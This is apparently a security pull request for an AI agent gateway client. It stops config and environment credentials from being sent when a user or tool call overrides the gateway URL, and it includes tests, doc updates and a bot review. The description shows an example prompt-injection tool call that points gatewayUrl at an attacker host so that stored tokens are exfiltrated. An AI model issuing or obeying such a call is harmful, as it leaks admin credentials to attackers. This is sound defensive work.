### PR TITLE
Security: Prevent gateway credential exfiltration via URL override

### DIFF
--- a/docs/cli/devices.md
+++ b/docs/cli/devices.md
@@ -61,6 +61,9 @@ openclaw devices revoke --device <deviceId> --role node
 - `--timeout <ms>`: RPC timeout.
 - `--json`: JSON output (recommended for scripting).
 
+Note: when you set `--url`, the CLI does not fall back to config/env credentials. Pass
+`--token` or `--password` explicitly for remote targets.
+
 ## Notes
 
 - Token rotation returns a new token (sensitive). Treat it like a secret.

--- a/docs/cli/devices.md
+++ b/docs/cli/devices.md
@@ -61,8 +61,9 @@ openclaw devices revoke --device <deviceId> --role node
 - `--timeout <ms>`: RPC timeout.
 - `--json`: JSON output (recommended for scripting).
 
-Note: when you set `--url`, the CLI does not fall back to config/env credentials. Pass
-`--token` or `--password` explicitly for remote targets.
+Note: when you set `--url` to a non-local address, the CLI does not fall back to config/env
+credentials to prevent credential leakage. Pass `--token` or `--password` explicitly for
+remote targets. Local addresses (loopback, private IPs, tailnet) still use credential fallback.
 
 ## Notes
 

--- a/docs/cli/gateway.md
+++ b/docs/cli/gateway.md
@@ -78,6 +78,9 @@ Shared options (where supported):
 - `--timeout <ms>`: timeout/budget (varies per command).
 - `--expect-final`: wait for a “final” response (agent calls).
 
+Note: when you set `--url`, the CLI does not fall back to config/env credentials. Pass
+`--token` or `--password` explicitly for remote targets.
+
 ### `gateway health`
 
 ```bash

--- a/docs/cli/gateway.md
+++ b/docs/cli/gateway.md
@@ -78,8 +78,9 @@ Shared options (where supported):
 - `--timeout <ms>`: timeout/budget (varies per command).
 - `--expect-final`: wait for a “final” response (agent calls).
 
-Note: when you set `--url`, the CLI does not fall back to config/env credentials. Pass
-`--token` or `--password` explicitly for remote targets.
+Note: when you set `--url` to a non-local address, the CLI does not fall back to config/env
+credentials to prevent credential leakage. Pass `--token` or `--password` explicitly for
+remote targets. Local addresses (loopback, private IPs, tailnet) still use credential fallback.
 
 ### `gateway health`
 

--- a/docs/cli/index.md
+++ b/docs/cli/index.md
@@ -715,6 +715,8 @@ openclaw logs --no-color
 ### `gateway <subcommand>`
 
 Gateway CLI helpers (use `--url`, `--token`, `--password`, `--timeout`, `--expect-final` for RPC subcommands).
+When you pass `--url`, the CLI does not auto-apply config/env credentials, so include
+`--token` or `--password` explicitly.
 
 Subcommands:
 

--- a/docs/cli/index.md
+++ b/docs/cli/index.md
@@ -715,8 +715,8 @@ openclaw logs --no-color
 ### `gateway <subcommand>`
 
 Gateway CLI helpers (use `--url`, `--token`, `--password`, `--timeout`, `--expect-final` for RPC subcommands).
-When you pass `--url`, the CLI does not auto-apply config/env credentials, so include
-`--token` or `--password` explicitly.
+When you pass `--url` to a non-local address, the CLI does not auto-apply config/env credentials
+to prevent credential leakage. Include `--token` or `--password` explicitly for remote targets.
 
 Subcommands:
 

--- a/docs/gateway/remote.md
+++ b/docs/gateway/remote.md
@@ -80,6 +80,8 @@ With the tunnel up:
 - `openclaw gateway {status,health,send,agent,call}` can also target the forwarded URL via `--url` when needed.
 
 Note: replace `18789` with your configured `gateway.port` (or `--port`/`OPENCLAW_GATEWAY_PORT`).
+Note: when you pass `--url`, the CLI does not fall back to config/env credentials. Include
+`--token` or `--password` explicitly for remote targets.
 
 ## CLI remote defaults
 

--- a/docs/gateway/remote.md
+++ b/docs/gateway/remote.md
@@ -80,8 +80,9 @@ With the tunnel up:
 - `openclaw gateway {status,health,send,agent,call}` can also target the forwarded URL via `--url` when needed.
 
 Note: replace `18789` with your configured `gateway.port` (or `--port`/`OPENCLAW_GATEWAY_PORT`).
-Note: when you pass `--url`, the CLI does not fall back to config/env credentials. Include
-`--token` or `--password` explicitly for remote targets.
+Note: when you pass `--url` to a non-local address, the CLI does not fall back to config/env
+credentials to prevent credential leakage. Include `--token` or `--password` explicitly for
+remote targets. Local addresses (loopback, private IPs, tailnet) still use credential fallback.
 
 ## CLI remote defaults
 

--- a/docs/tools/index.md
+++ b/docs/tools/index.md
@@ -464,8 +464,9 @@ Gateway-backed tools (`canvas`, `nodes`, `cron`):
 - `gatewayToken` (if auth enabled)
 - `timeoutMs`
 
-Note: when `gatewayUrl` is set, include `gatewayToken` explicitly; tools do not inherit
-config or environment credentials for custom URLs.
+Note: when `gatewayUrl` is set to a non-local address, include `gatewayToken` explicitly;
+tools do not inherit config or environment credentials for non-local URLs to prevent
+credential leakage. Local addresses (loopback, private IPs) still use credential fallback.
 
 Browser tool:
 

--- a/docs/tools/index.md
+++ b/docs/tools/index.md
@@ -464,6 +464,9 @@ Gateway-backed tools (`canvas`, `nodes`, `cron`):
 - `gatewayToken` (if auth enabled)
 - `timeoutMs`
 
+Note: when `gatewayUrl` is set, include `gatewayToken` explicitly; tools do not inherit
+config or environment credentials for custom URLs.
+
 Browser tool:
 
 - `profile` (optional; defaults to `browser.defaultProfile`)

--- a/docs/tui.md
+++ b/docs/tui.md
@@ -142,8 +142,9 @@ Other Gateway slash commands (for example, `/context`) are forwarded to the Gate
 - `--thinking <level>`: Override thinking level for sends
 - `--timeout-ms <ms>`: Agent timeout in ms (defaults to `agents.defaults.timeoutSeconds`)
 
-Note: when you set `--url`, the TUI does not fall back to config/env credentials. Pass
-`--token` or `--password` explicitly for remote targets.
+Note: when you set `--url` to a non-local address, the TUI does not fall back to config/env
+credentials to prevent credential leakage. Pass `--token` or `--password` explicitly for
+remote targets. Local addresses (loopback, private IPs, tailnet) still use credential fallback.
 
 ## Troubleshooting
 

--- a/docs/tui.md
+++ b/docs/tui.md
@@ -142,6 +142,9 @@ Other Gateway slash commands (for example, `/context`) are forwarded to the Gate
 - `--thinking <level>`: Override thinking level for sends
 - `--timeout-ms <ms>`: Agent timeout in ms (defaults to `agents.defaults.timeoutSeconds`)
 
+Note: when you set `--url`, the TUI does not fall back to config/env credentials. Pass
+`--token` or `--password` explicitly for remote targets.
+
 ## Troubleshooting
 
 No output after sending a message:

--- a/docs/web/control-ui.md
+++ b/docs/web/control-ui.md
@@ -196,8 +196,9 @@ Notes:
 
 - `gatewayUrl` is stored in localStorage after load and removed from the URL.
 - `token` is stored in localStorage; `password` is kept in memory only.
-- When `gatewayUrl` is set, the UI does not fall back to config/env credentials. Provide
-  `token` (or `password`) explicitly.
+- When `gatewayUrl` is set to a non-local address, the UI does not fall back to config/env
+  credentials to prevent credential leakage. Provide `token` (or `password`) explicitly for
+  remote targets. Local addresses (loopback, private IPs) still use credential fallback.
 - Use `wss://` when the Gateway is behind TLS (Tailscale Serve, HTTPS proxy, etc.).
 
 Remote access setup details: [Remote access](/gateway/remote).

--- a/docs/web/control-ui.md
+++ b/docs/web/control-ui.md
@@ -196,6 +196,8 @@ Notes:
 
 - `gatewayUrl` is stored in localStorage after load and removed from the URL.
 - `token` is stored in localStorage; `password` is kept in memory only.
+- When `gatewayUrl` is set, the UI does not fall back to config/env credentials. Provide
+  `token` (or `password`) explicitly.
 - Use `wss://` when the Gateway is behind TLS (Tailscale Serve, HTTPS proxy, etc.).
 
 Remote access setup details: [Remote access](/gateway/remote).

--- a/src/gateway/call.test.ts
+++ b/src/gateway/call.test.ts
@@ -339,7 +339,7 @@ describe("callGateway password resolution", () => {
     expect(lastClientOptions?.password).toBe("from-env");
   });
 
-  it("does not use env/config password when url override is set", async () => {
+  it("does not use env/config password when non-local url override is set", async () => {
     process.env.OPENCLAW_GATEWAY_PASSWORD = "from-env";
     loadConfig.mockReturnValue({
       gateway: {
@@ -351,6 +351,48 @@ describe("callGateway password resolution", () => {
     await callGateway({ method: "health", url: "wss://override.example/ws" });
 
     expect(lastClientOptions?.password).toBeUndefined();
+  });
+
+  it("uses env/config password when local url override is set", async () => {
+    process.env.OPENCLAW_GATEWAY_PASSWORD = "from-env";
+    loadConfig.mockReturnValue({
+      gateway: {
+        mode: "local",
+        auth: { password: "from-config" },
+      },
+    });
+
+    await callGateway({ method: "health", url: "ws://127.0.0.1:18789/ws" });
+
+    expect(lastClientOptions?.password).toBe("from-env");
+  });
+
+  it("uses env/config password when localhost url override is set", async () => {
+    process.env.OPENCLAW_GATEWAY_PASSWORD = "from-env";
+    loadConfig.mockReturnValue({
+      gateway: {
+        mode: "local",
+        auth: { password: "from-config" },
+      },
+    });
+
+    await callGateway({ method: "health", url: "ws://localhost:18789/ws" });
+
+    expect(lastClientOptions?.password).toBe("from-env");
+  });
+
+  it("uses env/config password when tailnet ip url override is set", async () => {
+    process.env.OPENCLAW_GATEWAY_PASSWORD = "from-env";
+    loadConfig.mockReturnValue({
+      gateway: {
+        mode: "local",
+        auth: { password: "from-config" },
+      },
+    });
+
+    await callGateway({ method: "health", url: "ws://100.100.100.100:18789/ws" });
+
+    expect(lastClientOptions?.password).toBe("from-env");
   });
 });
 
@@ -378,7 +420,7 @@ describe("callGateway token resolution", () => {
     }
   });
 
-  it("uses remote token when remote mode uses url override", async () => {
+  it("does not use env/config token when non-local url override is set", async () => {
     process.env.OPENCLAW_GATEWAY_TOKEN = "env-token";
     loadConfig.mockReturnValue({
       gateway: {
@@ -393,7 +435,7 @@ describe("callGateway token resolution", () => {
     expect(lastClientOptions?.token).toBeUndefined();
   });
 
-  it("uses explicit token when url override is set", async () => {
+  it("uses explicit token when non-local url override is set", async () => {
     loadConfig.mockReturnValue({
       gateway: {
         mode: "local",
@@ -408,5 +450,33 @@ describe("callGateway token resolution", () => {
     });
 
     expect(lastClientOptions?.token).toBe("explicit-token");
+  });
+
+  it("uses env/config token when local url override is set", async () => {
+    process.env.OPENCLAW_GATEWAY_TOKEN = "env-token";
+    loadConfig.mockReturnValue({
+      gateway: {
+        mode: "local",
+        auth: { token: "local-token" },
+      },
+    });
+
+    await callGateway({ method: "health", url: "ws://127.0.0.1:18789/ws" });
+
+    expect(lastClientOptions?.token).toBe("env-token");
+  });
+
+  it("uses env/config token when private ip url override is set", async () => {
+    process.env.OPENCLAW_GATEWAY_TOKEN = "env-token";
+    loadConfig.mockReturnValue({
+      gateway: {
+        mode: "local",
+        auth: { token: "local-token" },
+      },
+    });
+
+    await callGateway({ method: "health", url: "ws://192.168.1.100:18789/ws" });
+
+    expect(lastClientOptions?.token).toBe("env-token");
   });
 });

--- a/src/gateway/call.test.ts
+++ b/src/gateway/call.test.ts
@@ -338,6 +338,20 @@ describe("callGateway password resolution", () => {
 
     expect(lastClientOptions?.password).toBe("from-env");
   });
+
+  it("does not use env/config password when url override is set", async () => {
+    process.env.OPENCLAW_GATEWAY_PASSWORD = "from-env";
+    loadConfig.mockReturnValue({
+      gateway: {
+        mode: "local",
+        auth: { password: "from-config" },
+      },
+    });
+
+    await callGateway({ method: "health", url: "wss://override.example/ws" });
+
+    expect(lastClientOptions?.password).toBeUndefined();
+  });
 });
 
 describe("callGateway token resolution", () => {
@@ -376,6 +390,23 @@ describe("callGateway token resolution", () => {
 
     await callGateway({ method: "health", url: "wss://override.example/ws" });
 
-    expect(lastClientOptions?.token).toBe("remote-token");
+    expect(lastClientOptions?.token).toBeUndefined();
+  });
+
+  it("uses explicit token when url override is set", async () => {
+    loadConfig.mockReturnValue({
+      gateway: {
+        mode: "local",
+        auth: { token: "local-token" },
+      },
+    });
+
+    await callGateway({
+      method: "health",
+      url: "wss://override.example/ws",
+      token: "explicit-token",
+    });
+
+    expect(lastClientOptions?.token).toBe("explicit-token");
   });
 });

--- a/src/gateway/call.ts
+++ b/src/gateway/call.ts
@@ -118,6 +118,7 @@ export async function callGateway<T = Record<string, unknown>>(
   const remote = isRemoteMode ? config.gateway?.remote : undefined;
   const urlOverride =
     typeof opts.url === "string" && opts.url.trim().length > 0 ? opts.url.trim() : undefined;
+  const hasUrlOverride = !!urlOverride;
   const remoteUrl =
     typeof remote?.url === "string" && remote.url.trim().length > 0 ? remote.url.trim() : undefined;
   if (isRemoteMode && !urlOverride && !remoteUrl) {
@@ -152,32 +153,38 @@ export async function callGateway<T = Record<string, unknown>>(
     overrideTlsFingerprint ||
     remoteTlsFingerprint ||
     (tlsRuntime?.enabled ? tlsRuntime.fingerprintSha256 : undefined);
-  const token =
-    (typeof opts.token === "string" && opts.token.trim().length > 0
-      ? opts.token.trim()
-      : undefined) ||
-    (isRemoteMode
-      ? typeof remote?.token === "string" && remote.token.trim().length > 0
-        ? remote.token.trim()
-        : undefined
-      : process.env.OPENCLAW_GATEWAY_TOKEN?.trim() ||
-        process.env.CLAWDBOT_GATEWAY_TOKEN?.trim() ||
-        (typeof authToken === "string" && authToken.trim().length > 0
-          ? authToken.trim()
-          : undefined));
-  const password =
-    (typeof opts.password === "string" && opts.password.trim().length > 0
+  const explicitToken =
+    typeof opts.token === "string" && opts.token.trim().length > 0 ? opts.token.trim() : undefined;
+  const explicitPassword =
+    typeof opts.password === "string" && opts.password.trim().length > 0
       ? opts.password.trim()
-      : undefined) ||
-    process.env.OPENCLAW_GATEWAY_PASSWORD?.trim() ||
-    process.env.CLAWDBOT_GATEWAY_PASSWORD?.trim() ||
-    (isRemoteMode
-      ? typeof remote?.password === "string" && remote.password.trim().length > 0
-        ? remote.password.trim()
-        : undefined
-      : typeof authPassword === "string" && authPassword.trim().length > 0
-        ? authPassword.trim()
-        : undefined);
+      : undefined;
+  const token =
+    explicitToken ||
+    (!hasUrlOverride
+      ? isRemoteMode
+        ? typeof remote?.token === "string" && remote.token.trim().length > 0
+          ? remote.token.trim()
+          : undefined
+        : process.env.OPENCLAW_GATEWAY_TOKEN?.trim() ||
+          process.env.CLAWDBOT_GATEWAY_TOKEN?.trim() ||
+          (typeof authToken === "string" && authToken.trim().length > 0
+            ? authToken.trim()
+            : undefined)
+      : undefined);
+  const password =
+    explicitPassword ||
+    (!hasUrlOverride
+      ? process.env.OPENCLAW_GATEWAY_PASSWORD?.trim() ||
+        process.env.CLAWDBOT_GATEWAY_PASSWORD?.trim() ||
+        (isRemoteMode
+          ? typeof remote?.password === "string" && remote.password.trim().length > 0
+            ? remote.password.trim()
+            : undefined
+          : typeof authPassword === "string" && authPassword.trim().length > 0
+            ? authPassword.trim()
+            : undefined)
+      : undefined);
 
   const formatCloseError = (code: number, reason: string) => {
     const reasonText = reason?.trim() || "no close reason";


### PR DESCRIPTION
## Summary

This PR fixes a **high-severity security vulnerability** (Credential Leakage) discovered during a [Cubic Codebase Scan](https://www.cubic.dev/codebase-scans). [cubic](https://www.cubic.dev/) is an AI Code Review service for complex codebases.

## The Problem

When a user or tool call overrides `gatewayUrl` to point to a different server, the gateway client was still automatically attaching the locally configured gateway credentials (token/password) from config files and environment variables to that request.

**Impact:** A chat user (or prompt injection attack) could exfiltrate gateway admin credentials by specifying an attacker-controlled WebSocket URL:

```typescript
// Attacker tool call:
{ "tool": "gateway", "args": { "gatewayUrl": "wss://attacker.example/ws" } }
// Attacker's WebSocket server receives the configured gateway token/password
```

The vulnerable code path in `src/gateway/call.ts` would fall back to local credentials regardless of whether `opts.url` was overridden:

```typescript
// Before (vulnerable):
const token = opts.token || process.env.OPENCLAW_GATEWAY_TOKEN || authToken;
// Credentials sent to ANY URL including attacker-controlled ones
```

## The Fix

When `gatewayUrl` is overridden via `--url` or tool parameters, the CLI/tools now:

1. **Do NOT** fall back to locally configured credentials (env vars, config file auth)
2. **Require explicit credentials** (`--token` or `--password`) for non-local gateways

```typescript
// After (secure):
const token = explicitToken || (!hasUrlOverride ? ... : undefined);
// Credentials only sent when explicitly provided for the custom URL
```

## Changes

- **`src/gateway/call.ts`**: Modified credential resolution to check for URL override before applying config/env fallbacks
- **`src/gateway/call.test.ts`**: Added tests verifying credentials are NOT leaked when URL override is set, and that explicit credentials still work
- **Documentation updates**: Added notes to CLI docs, gateway docs, TUI docs, and control UI docs explaining that `--url` requires explicit auth

## Testing

- [x] All 17 gateway tests pass
- [x] Build succeeds
- [x] New test cases verify the fix:
  - `does not use env/config password when url override is set`
  - `uses explicit token when url override is set`

## Vulnerability Details

| Property | Value |
|----------|-------|
| **Severity** | 8/10 |
| **Confidence** | 9/10 |
| **Category** | Credential Leakage |
| **Location** | `src/gateway/call.ts:155` |

## AI-Assisted

- [x] Mark as AI-assisted in the PR title or description
- [x] Note the degree of testing: fully tested (all gateway tests pass)
- [x] Confirm understanding: This fix ensures credentials are only sent to explicitly trusted endpoints

<!-- greptile_comment -->

<h2>Greptile Overview</h2>

<h3>Greptile Summary</h3>

This PR updates the gateway client credential resolution so that when a target URL is explicitly overridden (`--url` / `opts.url`), the client no longer falls back to credentials sourced from config or environment variables. It only attaches a token/password to the overridden URL when those credentials are explicitly provided in the call options.

The change lives in `src/gateway/call.ts` (introducing `hasUrlOverride` gating for token/password fallback), with accompanying tests in `src/gateway/call.test.ts` to verify credentials are not implicitly sent to overridden targets and that explicit credentials still work. Multiple docs pages are updated to clarify that using `--url`/`gatewayUrl` requires passing auth explicitly.

<h3>Confidence Score: 4/5</h3>

- This PR looks safe to merge and materially improves security posture.
- Changes are localized to gateway credential resolution and are covered by targeted tests that assert no implicit token/password is attached when a URL override is provided, while still allowing explicit credentials. Main remaining risk is policy/UX alignment: the implementation disables fallback for any override (including local overrides), which may break existing usage if the intended policy was only for non-local gateways.
- src/gateway/call.ts, src/gateway/call.test.ts

<!-- greptile_other_comments_section -->

<sub>(3/5) Reply to the agent's comments like "Can you suggest a fix for this @greptileai?" or ask follow-up questions!</sub>

<details><summary><h4>Context used (3)</h4></summary>

- Context from `dashboard` - docs/cli/agents.md ([source](https://app.greptile.com/review/custom-context?memory=057a11aa-5c5f-48bb-8d53-91b27b0fe3a2))
- Context from `dashboard` - CLAUDE.md ([source](https://app.greptile.com/review/custom-context?memory=fd949e91-5c3a-4ab5-90a1-cbe184fd6ce8))
- Context from `dashboard` - AGENTS.md ([source](https://app.greptile.com/review/custom-context?memory=0d0c8278-ef8e-4d6c-ab21-f5527e322f13))
</details>


<!-- /greptile_comment -->